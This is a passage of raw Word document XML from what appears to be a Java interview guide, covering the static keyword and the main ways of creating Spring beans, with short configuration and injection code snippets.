      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static variables and methods reduce memory consumption because they are shared by all instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14C93FCC" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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Global access</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static members can be accessed directly via the class name, making them globally accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07A13840" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C50">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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itialization</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Static blocks allow for initialization of static variables when the class is loaded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EF79922" w14:textId="77777777" w:rsidR="008A69F7" w:rsidRPr="00CE4B95" w:rsidRDefault="008A69F7" w:rsidP="00DB5C5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tatic keyword is an essential feature in Java that helps manage shared resources, class-level operations, and object-independent behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01E777A0" w14:textId="3FF240AD"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99B900E">
          <v:rect id="_x0000_i1216" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BA375D2" w14:textId="7D799A21" w:rsidR="00EB7E74" w:rsidRPr="00CE4B95" w:rsidRDefault="00EF49CF">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="71" w:name="_Toc196307551"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How many ways can we create beans in java</w:t>
      </w:r>
      <w:r w:rsidR="00EB7E74" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="71"/>
    </w:p>
    <w:p w14:paraId="456BCE62" w14:textId="43B90BAF" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">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beans (also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JavaBeans</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) are classes that adhere to certain conventions. These classes are typically used in frameworks like Spring to define objects that can be easily manipulated and injected into other parts of an application.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53D9692E"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re are several ways to create beans in Java, especially in the context of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Spring Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here are the main ways you can create and manage beans in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56A4F2E9" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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Using XML Configuration (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1107AF63"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is one of the traditional ways to create beans in Spring. Beans are declared in an XML configuration file and can be instantiated, configured, and injected by the Spring container.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EE01B2A"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267F0EEC"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t;bean id="myBean" class="com.example.MyClass"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="736C4687"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t;property name="property1" value="value1"/&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDA9E3C"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t;/bean&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CF51A92"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method, the Spring framework uses the XML configuration to define the beans, their dependencies, and other properties.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52092469" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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Using Annotation-Based Configuration (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43C6B406"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ince Spring 2.5, </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be used to configure beans. This is a more modern approach and is widely used in Spring applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38F528E4"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mon annotations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="302E7D15" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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 Marks a class as a Spring-managed bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028168B2" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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utowired: Injects dependencies into the bean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399A34E1" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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figuration: Indicates that the class contains bean definitions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BEB68C4" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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an: Defines beans within a @Configuration class.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="411F0D8E" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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alue: Injects property values into fields.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F57DF38"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491B50FE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37FEFE76"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yClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C74B4B5"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3445544E"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AnotherBean anotherBean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62BFF1ED"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8B0F6C6"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onstructor, setters, and other methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37F7F66D"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EB58E09" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5616D253"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figuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="448F98F0"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53EB0069"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="797B9216"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MyClass myClass() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14A03CF2"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new MyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624ED991"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5FD7EB9"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8F33A06"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Here, the @Component annotation is used to mark MyClass as a bean, and Spring will manage its lifecycle. The @Bean annotation inside @Configuration is used to define a bean manually.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5605E892" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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Using Java-based Configuration (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB81490"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pring also provides a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java-based configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (also known as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>JavaConfig</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>) to define beans and their dependencies in Java classes rather than in XML.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FF9A4E4"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47378ABB"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figuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38D201D9"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B9DBA78"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D07893A"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="452844D2"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MyClass myClass() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34E50275"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new MyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="509C17FF"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F517525"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307C84F"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allows a more programmatic approach to creating beans, without the need for XML files.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9C5D90" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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Using @ComponentScan (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35BE0F24"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Spring, you can use @ComponentScan to automatically scan the specified package (and its sub-packages) for classes annotated with @Component, @Service, @Repository, or @Controller. These beans are automatically registered with the Spring context.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5757A9E6"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591DC3E1"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figuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F07B15"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Scan("com.example")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55AEC77E"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D281812"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Beans will be scanned from the "com.example" package</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76304892"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55D07AB" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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Factory Method (Spring or Plain Java)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CFC040F"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Factory method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> pattern can be used to create beans in a more customized way. A factory method can instantiate and configure objects according to specific conditions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B34A496"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2D9B1956"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3227C20C"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yClassFactory {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A4C1CFA"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5007BC3"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MyClass createMyClass() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E98B29E"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new MyClass("Some property value");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53093BE0"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44AF078"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9F7FB3E" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696E5695"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figuration</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48FC82E5"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AppConfig {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A367332"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Bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35EDFD23"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MyClass myClass() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0614F57F"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MyClassFactory.createMyClass();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1AAB14"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32202F8"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AD8C2BB"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case, MyClass is created using a factory method, which can perform additional logic before returning the object.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28B34339" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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Using @PostConstruct and @PreDestroy (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00269988"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se annotations are used to specify initialization and destruction methods for beans. The methods annotated with @PostConstruct will be called after the bean is instantiated, and those with @PreDestroy will be called before the bean is destroyed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63DCB63E"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25485F70"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="648217AA"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yClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DD2B5A3"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78F2919"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ostConstruct</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A2879B9"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init() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD29FA6"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 Initialization logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74437D4A"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C2A85DA" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="665DF3B4"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eDestroy</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D5B35BB"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cleanup() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F290BA4"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leanup logic</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B08213"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27AD12B"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CB73649"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ensures that proper resource management (initialization and destruction) is handled for beans.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAA7C4B" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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7. Singleton and Prototype Beans (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="466F00B1"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y default, Spring beans are </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>singleton</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">-scoped, meaning only one instance of the bean is created and shared within the Spring context. However, you can also define </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>prototype</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>-scoped beans, where a new instance is created every time the bean is requested.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B7A7007"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13287B56"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cope("singleton")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13104DF7"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="738BA749"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ySingletonBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9DA251"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ingleton bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D68CE92"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8C9AC60" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1BE6CA1A"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cope("prototype")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7FE3F825"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67B3A630"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yPrototypeBean {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71FB7E4A"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ototype bean</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5828CA94"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FF0669C"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 define the scope of the bean either using the @Scope annotation or in XML configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349D3628" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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8. Using @Value and External Configuration (Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E335AF3"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ans can be configured with external property values using the @Value annotation. These values can come from property files, system properties, or environment variables.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6334DB84"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7DD63C7A"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EDB193F"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yClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5664425A"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alue("${my.property}")</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5266F0"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ring propertyValue;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7743E2C5"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25F9AC1"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onstructor and methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28C082E8"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C6AB8E0"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case, Spring will inject the value of my.property from an external configuration file into the propertyValue field.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25435BDE" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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9. Using Dependency Injection via Constructor or Setter Injection</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24281C1B"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Spring, beans can be injected either through </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>constructor injection</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setter injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Constructor injection is preferred for mandatory dependencies, while setter injection is used for optional dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CB0416"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structor Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54689662"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B5E1800"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yClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CB8F24"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AnotherBean anotherBean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="633F3B6E" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BD7E5C6"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7496853D"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MyClass(AnotherBean anotherBean) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D826AB9"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anotherBean = anotherBean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F4514E6"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83F7F4A"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7031B83"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tter Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D43646E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D70A2E8"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yClass {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55267B0B"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AnotherBean anotherBean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="404B29E4" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1E92E1F4"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utowired</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03F3041E"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setAnotherBean(AnotherBean anotherBean) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CF1A866"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anotherBean = anotherBean;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD61F0D"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A72394D"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B0CF0F4" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC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 of Ways to Create Beans in Java:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A847A0A" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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XML Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Traditional approach in Spring)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="374A8A5B" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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nnotation-based Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Modern Spring approach)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41AA8BCB" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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ava-based Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Programmatic bean definition)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C1B034" w14:textId="77777777" w:rsidR="00314EC5" w:rsidRPr="00CE4B95" w:rsidRDefault="00314EC5" w:rsidP="00267AC9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4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onent Scanning</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (@ComponentScan)</w:t>
      </w:r>
